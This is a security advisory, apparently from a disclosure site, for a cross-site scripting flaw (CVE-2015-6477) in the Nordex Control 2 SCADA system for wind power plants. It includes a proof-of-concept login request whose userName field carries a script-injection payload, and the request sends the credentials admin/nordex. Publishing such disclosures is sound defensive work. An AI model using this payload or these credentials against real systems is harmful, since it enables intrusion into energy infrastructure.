Nordex NC2 XSS Vulnerability

2015.12.24

Credit: Karn Ganeshen

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2015-6477

CWE: CWE-79

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

*Nordex NC2 XSS Vulnerability*

*AFFECTED PRODUCTS*
Nordex Control 2 (NC2) SCADA V16 and prior versions.

Nordex is a company based in Germany that maintains offices in countries around the world.

The affected product, Nordex Control 2, is a web-based SCADA system for
wind power plants. According to Nordex, NC2 is deployed across the Energy
sector. Nordex estimates that this product is used primarily in the United
States, Europe, and China.


*CVE-ID*
CVE-2015-6477

*Reference*
https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01

*Vulnerable parameter*
username

*PoC*

POST /login HTTP/1.1

connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&pw=nordex&language=en

-- 
Best Regards,
Karn Ganeshen

References:

https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Nordex NC2 XSS Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.